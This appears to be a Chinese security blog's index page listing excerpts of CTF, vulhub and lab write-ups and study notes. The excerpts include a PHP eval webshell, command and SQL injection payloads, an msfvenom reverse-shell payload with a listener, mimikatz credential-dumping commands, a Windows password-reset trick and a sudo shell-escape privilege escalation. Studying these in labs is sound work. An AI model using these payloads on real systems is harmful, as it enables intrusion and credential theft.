自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(61)
  • 收藏
  • 关注

原创 WordPress Activity Monitor插件远程命令执行漏洞

0x01、信息收集通过扫描目录发现有wp-login.php登录界面用nurpsuite爆破得到amin密码0x02、利用主题文件写马登陆进入后台,然后编辑主题的404.php文件,然后访问木马http://xxx/wp-content/themes/twentysixteen/404.php最后用蚁剑进行连接。0x03、利用Activity Monitor插件执行远程命令找到Activity Monitor下面的tool,然后输入127.0.0.1|ls /执行命令这里输入框

2021-05-14 17:37:22 929 2

原创 BeesCMS系统漏洞分析溯源(墨者学院)

0x01、信息收集拿到网站,先扫描目录,发现有后台登录界面尝试登录,发现弱口令admin/admin成功进入后台找到上传文件的地方准备文件上传但是多次尝试都未能成功,就算普通图片也没法上传0x02、sql注入后来发现在登录界面有sql注入经过尝试发现过滤了一些关键字user=admin' uni union on seselectlect updatexml('1',concat('~',(seselectlect database())),'1')#&password=123

2021-05-13 11:54:45 1585

原创 Windows severce 2008域的搭建

0x01、Windows server 2008安装域控打开域管理,选择角色,添加角色安装好后关闭打开cmd输入dcpromo.exe然后立刻重启计算机添加域用户取消勾选用户下次登录时更改密码0x02、把Windows server 2003加入到域控中打开cmd输入ncpa.cpl,打开网络设置windows server 2008 ip地址打开我的电脑,属性域权限的账号密码就是windows 2008的管理员用户的账号密码加入域之后必须

2021-04-16 22:12:38 615

原创 破解win7开机密码

0x01、重启电脑使电脑异常关闭,再正确启动windows,然后选择状态重置然后选择启动启动修复(推荐)启动修复,查找问题期间无论出现什么弹窗都选取消经过漫长的等待后会出现一下界面然后选择文件——>打开进入C:\Windows\System32,找到osk并重命名,再把cmd重命名为osk勾选不使用键盘键入就会出现命令行执行框,貌似还是system权限(windows下最高权限)想方设法输入打开命令提示符然后输入以下内容net user Administrator

2021-03-14 22:48:32 1137

原创 密码抓取(mimikatz)

0x01、基本用法:CRYPTO::Certificates -列出/导出凭证。PRIVILEGE::Debug -获得Debug权限SEKURLSA::LogonPasswords -列出所有可用的提供者的凭据TOKEN:List -列出系统中的所有令牌。TOKEN::Elevate -假冒令牌。用于提升权限至SYSTEM权限(默认情况下)0x02、加载方法msfload mimikatz //加载mimikatzwdigest //列出所有可用的账号密码(与以下三个命令一样)

2021-03-12 10:05:48 2376

原创 vulhub靶场thinkphp漏洞复现

0x01、ThinkPHP 2.x 任意代码执行漏洞原理ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。漏洞复现直接

2021-03-08 09:02:48 1672 1

原创 vulhub靶场struts2漏洞复现

0x01、S2-001远程代码执行漏洞原理该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行影响版本Struts 2.0.0 - Struts 2.0.8poc执行任意命令%{#a=(new java.lan

2021-03-06 21:41:16 2971

原创 DNS劫持(记录)

一、什么是DNS欺骗DNS(英文:Domain Name System)域名系统,主要用来把域名(domain name)转换为与之相对应的IP地址 (IP address)。DNS工作原理:1、客户端输入域名,查询本地缓存2、本地DNS服务器查询,本地DNS服务器内部缓存3、本地DNS向根域名服务器查询,根域服务器返回一级域地址4、本地DNS向根域返回的一级域服务器查询,一级域的本地缓存5、查询到终结果,返回给本地DNS服务器6、本地DNS服务器,将解析的结果返回客户端7、客户端根据返回

2020-11-26 17:14:10 422

原创 upload-labs通关总结

前言: 前几天看到大佬在玩upload-labs,所以自己也来玩玩,随便练习练习上传漏洞。upload-labs下载地址:https://github.com/c0ny1/upload-labs安装方法: 先下载upload-labs,解压后去掉文件名后面的-master,放在phpstudy的www根目录下,然后把phpstudy的版本切换成 PHP - 5.2.17,不然访问页面有些地方会...

2020-11-08 12:07:48 1241 1

原创 python 正则表达式小结(笔记)

0x01.(点) 匹配除换行符外的所有字符\. 匹配点\反斜杠能剥夺元字符特殊能力,反斜杠还能赋予普通字符特殊能力,比如/d能匹配所有数字

2020-10-10 21:36:49 240

原创 linux基础知识(笔记)

0x01、linux目录/home/用户名 存储一些用户相关的文档/usr 安装的应用程序0x02、linux常用命令cp 源文件或目录 目标目录-a 复制目录及其所有属性whereis 加命令名 //搜索命令位置的命令find 搜索范围 搜索条件例:find / -name flag.txt //从根目录下开始搜索flag.txtfind / -iname flag."*"-iname是搜索时候不区分大小写-a等于and,-o等于orlinux里的通配符

2020-10-04 17:45:56 165

原创 BUUCTFweb部分解题思路(PHP、Babysql、Upload、CheckIn)

PHP题目提示有备份文件,用扫描工具就能扫出来,得到源码class.php<?phpinclude 'flag.php';error_reporting(0);class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this->username = $us

2020-10-04 17:43:27 606

原创 BUUCTF部分web题解(easysql,easy_tornado,Ping Ping Ping)

easysql经过测试,发现过滤了很多东西,但有堆叠注入查询语句大概是select $_GET['query'] || flag from flag别问我是怎么知道的,问就是看的wp构造payload:*,1,得到select *,1 || flag from flag,即可查出表中的内容还可以用另一种解法:通过堆叠注入,设置sql_mode的值为PIPES_AS_CONCAT,从而将||视为字符串的连接操作符而非或运算符。1;set sql_mode=PIPES_AS_CONCAT;s

2020-09-15 12:57:19 598

原创 windows提权的几种姿势

一、工具提权1、msf提权准备阶段:用msfvenom生成一个马:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.112 lport=4444 -f exe > 3.exe然后用msf开启一个监听:use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.1.112set lport 4444expl

2020-09-07 08:31:38 4530

原创 Linux提权姿势

0x01、前言:linux的权限划分没有windows的那么复杂,提权只用从普通权限提升到root权限就可以了。0x02、提权姿势2.1、sudo提权先试试sudo su能否提权成功,如果不成功再进行下面的操作sudo -l:查看当前用户支持的命令这里显示的是all,也就是说我们可以用sudo操作所有的命令,但如果这里显示的只是mysql,那就执行下面的命令进行提权sudo mysql -e ‘! /bin/sh’2.2、suid提权SUID可以让调用者以文件拥有者的身份运行该文件,

2020-09-07 08:31:13 5116 1

原创 SSRF漏洞小结

0x01、SSRF简介SSRF (server-site request forery,服务端请求伪造)是一种构造请求, 由服务端发起请求的安全漏洞。一般情况下,攻击者无法直接访问到内网资源,但如果服务器存在SSRF漏洞,攻击者就可以利用SSRF攻击访问外网无法访问的内网资源。SSRF漏洞形成的原因是服务端提供了从其他服务器回去数据的功能,但没有对内网目标地址做过滤与限制。0x02、漏洞危害1、 可以对外网、内网、本地进行端口扫描, 获取一些服务的banner信息2、 攻击运行在内网或本地的应

2020-08-17 18:20:14 1487

原创 宽字节注入

0x01前言之前学基本注入的时候,就没有考虑过单引号或双引号被转义的情况,今天就来补充一下这方面的知识。在学习宽字节注入前,我们先了解一个函数addslashes:string addslashes ( string $str )返回字符串,该字符串为了数据库查询语句等的需要在某些字符前加上了反斜线。这些字符是单引号(')、双引号(")、反斜线(\)与 NUL(NULL 字符)。在...

2019-10-06 20:01:31 294

原创 攻防世界web系列

一、NaNNaNNaNNaN-Batman题目是一个文件web100,没有后缀,加上.php后缀后打开发现是乱码的把文件放在www根目录下,然后访问,发现有一个输入框查看网页源代码,发现也是乱码的最后的下划线“_”是一个变量,其内容是一个函数的代码,eval()函数的作用是输出,eval(_)的作用是输出一个函数的代码,我们把eval改成alert,让函数的代码用弹窗弹出来。把源...

2019-10-03 16:17:40 288

原创 Owasp juice shop(一)

0x01 前言最近玩了一下Owasp juice shop,觉得挺有意思的,Owasp juice shop是一个有着很多漏洞靶场,一共有47关,难度各有不同,可以满足一下菜鸟的黑客梦想。0x02 靶场搭建Juice shop是个开源项目,源码可在github上获取(https://github.com/bkimminich/juice-shop),最为方便的还是使用docker来安装。我用...

2019-09-10 18:53:56 3589

原创 PHP代码审计之危险函数

前言: 前几天总结了一下命令执行漏洞和代码执行漏洞,在其中发现了一些危险函数,其实危险函数还有很多,今天就来总结一下,之前总结过的就一笔带过,着重写之前没总结过的0x02 代码执行函数1.1 eval 函数eval函数可以把字符串当作php代码来执行,最常见的操作就是一句话木马:<?php @eval($_POST['ps']);?>1.2 assert函数assert函...

2019-08-24 09:16:12 853

原创 PHP超级全局变量

0x01 全局变量和局部变量全局变量:定义在函数外部变量的就是全局变量,它的作用域是从定义处一直到文件结尾。局部变量:函数内定义的变量就是局部变量,它的作用域为函数内。函数内,一般情况下是访问不了全局变量的例:<?php$a=9;$b=6;function add(){ echo $a+$b;//输出0}add();?>在函数内要是需要访问全局变量就需要使...

2019-08-22 21:48:00 398

原创 一些常见的编码

前言: 学了那么久的编码,之前一直都没有时间整理,现在来总结一下。1、base家族1.1、base16就是16进制,编码内容只有数字0-9,和大写英文字母A-F1.2、base32编码内容只有大写英文字母A-Z,和数字2345671.3、base64编码内容主要有大写英文字母A-Z,小写英文字母a-z,数字0-9,+和/2、凯撒密码凯撒密码主要通过偏移来实现加密,偏移量是几,密...

2019-08-21 22:42:00 6392

原创 命令执行&代码执行漏洞

一、命令执行漏洞0x01 命令执行漏洞应用有时需要调用一些执行系统命令的函数,当服务器没有严格过滤用户提供的参数时,就有可能导致用户提交恶意代码被服务器执行,从而造成命令执行漏洞。0x02 漏洞成因代码层过滤不严 系统的漏洞造成命令注入 调用的第三方组件存在代码执行漏洞0x03 常用命令执行函数(1) system ()该函数会把执行结果输出,并把输出结果的最后一行作为字符...

2019-08-21 13:41:40 2573

原创 Web常见的源码泄露

0x01 .git源码泄漏漏洞成因: 在运行git init初始化代码库的时候,会在当前目录下面产生一个.git的隐藏文件,用来记录代码的变更记录等等。在发布代码的时候,把.git这个目录没有删除,直接发布了。使用这个文件,可以用来恢复源代码。e.g. http://www.127.0.0.1/.git/config漏洞利用工具:1.GitHack下载地址:https://github...

2019-08-12 11:22:23 468

原创 RSA算法

0x01 对称加密与非对称加密1.1、加密和解密过程对称加密过程和解密过程使用的同一个密钥,加密过程相当于用原文+密钥可以传输出密文,同时解密过程用密文-密钥可以推导出原文。但非对称加密采用了两个密钥,一般使用公钥进行加密,使用私钥进行解密。1.2、加密解密速度对称加密解密的速度比较快,适合数据比较长时的使用。非对称加密和解密花费的时间长、速度相对较慢,只适合对少量数据的使用。1.3、传...

2019-08-09 17:38:52 555

原创 PHP反序列化

前言: 这几天在做题时发现好多知识点都不会,所以就来补充一下知识,今天就先学习学习反序列化的基础知识。参考视频:https://www.bilibili.com/video/av41677248?from=search&seid=13170057396150899076一、php反序列化原理1、序列化与反序列化序列化是将变量转换成可保存或传输的字符串的过程。反序列化就是在适当的时...

2019-08-08 18:17:45 178

原创 上传漏洞总结

前言: 这几天学了上传漏洞,真是涨姿势了,之前在web方面模糊的地方在这里得到了一些补充,为了加深印象,特地写一篇博客来记录一下。视频来源:https://www.bilibili.com/video/av51024187?from=search&seid=89328040590517243100x01 概要说明上传漏洞: 是很常见的一个漏洞,这个漏洞有时是服务器本身存在的漏洞,有时...

2019-07-31 12:44:55 379

原创 隐写术

隐写题目来源:实验吧题目描述:欢迎来到地狱打开压缩包我们发现里面还有一个压缩包,一个jpg图片和一个docx文件,除了jpg图片以外其他的都需要密码才能打开,而jpg图片打开后却是用winhex打开发现有FFD9文件尾却没有FFD8文件头修复文件头后打开然后根据文字提示下载网盘资源,是一个WAV文件听了几遍后才发现是摩斯密码,而且我还真的是听完的,然后手写的摩斯密码,后来我...

2019-07-28 16:41:01 260

原创 SQL注入姿势(3)

盲注**前言:**之前就想写一篇与盲注有关的博客,但由于一直不会写脚本,就拖下来了,现在把博客补上,因为手工注入比较麻烦,所以这篇主要写脚本注入。bool盲注以sqli-labs第8关为例第8关是bool盲注,首先判断注入点(无论什么注入,第一步都是判断注入点,就算写脚本第一步也要判断注入点),经过一番尝试,判断出闭合符号是单引号。在写脚本之前,我们先了解下脚本的思路:bool盲注的...

2019-07-27 22:22:55 182

原创 SQL注入一些过滤及绕过总结

前言: 前几天做了几道SQL注入的题,一上去就遇到这样那样的过滤,弄得我很难受,所以这里写一篇关于过滤一些的总结。1、过滤关键字过滤关键字应该是最常见的过滤了,因为只要把关键字一过滤,你的注入语句基本就不起作用了。绕过方法:(1)最常用的绕过方法就是用/**/,<>,分割关键字sel<>ectsel/**/ect(2)根据过滤程度,有时候还可以用双写绕过s...

2019-07-20 18:08:28 18054 2

原创 SQL简单注入

题目来源:https://www.ichunqiu.com/battalion一、SQL题目描述:出题人就告诉你这是个注入,有种别走!查看网页源码,发现源码中有select语句的信息,这下我们省事了。根据源码可看出,注入点无闭合符号,我们先构造payload:id=1 --+发现页面正常显示,那么我们的猜想是正确的。第一步判断字段数,输入:id=1 order by 1 ...

2019-07-20 13:30:48 819

原创 图片隐写

一、LSB题目来源:http://www.shiyanbar.com/ctf/1774题目就一张女神的图片nvshen.jpg题目提示是隐写,然而我拿着stegsolve找了一圈也没发现有什么。后来偷瞄大佬们的wp才发现这里要用到另一个与隐写有关的软件wbstego(还是小白太菜了,做个题连软件都不全)。wbstego下载链接:http://wbstego.wbailer.com/软件...

2019-07-18 17:51:43 1665

原创 攻防世界——Misc系列

一、功夫再高也怕菜刀一开始只有一个看不懂后缀的文件6666.pcapng,日常binwalk一下,发现里面有一个zip压缩包然后用foremost分离压缩包发现里面flag.txt,但是被加密了foremost下载链接:https://github.com/raddyfiy/foremostforemost使用方法:把要操作文件放在与foremost.exe同一目录下,然后在此目录下用c...

2019-07-18 09:48:51 907 1

原创 SQL注入姿势(2)

双注入

2019-07-14 22:26:51 143

原创 Web——爆破wp

前言:今天做了几道很有意思的web题,题目说是爆破,实际上与爆破y一点没有都关系。。。爆破一题目描述:<?phpinclude "flag.php";$a = @$_REQUEST['hello'];if(!preg_match('/^\w*$/',$a )){ die('ERROR');}eval("var_dump($$a);");show_source(__FIL...

2019-07-14 15:54:08 350

原创 WEB——php大法wp

前言:这道题我本来不想写wp的,但里面有一个坑,特写此篇博客来记录一下。题目描述:

2019-07-10 11:16:19 347

原创 图片隐写——小苹果wp

前言:今天做了一道非常绕的图片隐写题,不过通过这道题也收集到了一波工具,涨了不少姿势。题目的名称是小苹果,然后就只有一张中国结的图片apple.png直觉告诉我要扫这张二维码,扫完码内容如下:\u7f8a\u7531\u5927\u4e95\u592b\u5927\u4eba\u738b\u4e2d\u5de5乍一看,这是什么东西!然后去百度了一波才知道,这原来是Unicode编码。...

2019-07-09 10:44:44 676

原创 ISCC赛后总结

第一次参加ISCC线下赛就和队友一块拿了一等奖,真的很开心。不过回想起比赛过程,又觉得比赛体验很不好,揪其原因还是自己的技术太菜了。整个比赛中,上午的比赛还行,由于我们有选择题的题库,所以我们的选择题拿了850分左右。misc题,reverse题和mobile题又都是原题,虽然只被我们拿下了两道,不过一道题就1000分,所以我们拿的分也不低。但下午就不行了,下午开始打AWD,当时我们对线下赛的...

2019-06-24 19:40:45 1848 3

原创 xss挑战之旅学习笔记

前言:前几天学了xss攻击,觉得有必要写一篇博客记录一下。

2019-06-07 16:00:12 505

原创 bss项目开发感悟

前言:经过近一个月的努力,终于通过看孙胜利的视频把小清新bbs系统给开发出来了,可以说这一个月是我最忙也是最充实的一个月了。在这一个月的学习中,我感悟颇深。不多说了,下面我把开发思路简单的说一下。这个系统在功能方面主要分为两大部分:管理员操作的后台界面和用户操作的前台界面。后台界面:前台界面:在前台,用户可以在不登录的状态下浏览帖子,但要想发帖子和回复帖子必须要登录才行,...

2019-06-04 20:14:42 1029

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除